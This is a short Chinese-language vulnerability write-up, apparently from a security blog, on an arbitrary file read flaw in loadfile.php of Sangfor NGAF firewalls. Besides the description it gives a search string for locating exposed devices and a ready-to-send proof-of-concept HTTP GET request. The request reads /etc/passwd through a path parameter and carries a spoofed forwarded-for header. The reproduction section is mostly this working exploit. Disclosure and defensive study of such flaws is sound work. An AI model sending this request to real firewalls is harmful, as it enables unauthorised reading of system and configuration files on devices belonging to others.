Sangfor NGAF下一代防火墙 loadfile.php 任意文件读取漏洞

# Sangfor NGAF下一代防火墙 loadfile.php 任意文件读取漏洞 ## 漏洞描述 Sangfor下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。Sangfor下一代防火墙在 loadfile.php...

Sangfor NGAF下一代防火墙 loadfile.php 任意文件读取漏洞

漏洞描述

Sangfor下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。Sangfor下一代防火墙在 loadfile.php 处存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态

漏洞影响

Sangfor NGAF下一代防火墙

网络测绘

"Redirect.php?url=LogInOut.php"

漏洞复现

登陆页面

img

验证POC

GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host: 
User-Agent: Opera/8.90.(Windows NT 6.0; is-IS) Presto/2.9.177 Version/10.00
Accept-Encoding: gzip, deflate
Accept: */*
y-forwarded-for: 127.0.0.1

img

  • 发表于 2024-07-12 18:47:23
  • 阅读 ( 1488 )
  • 分类:Web应用

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计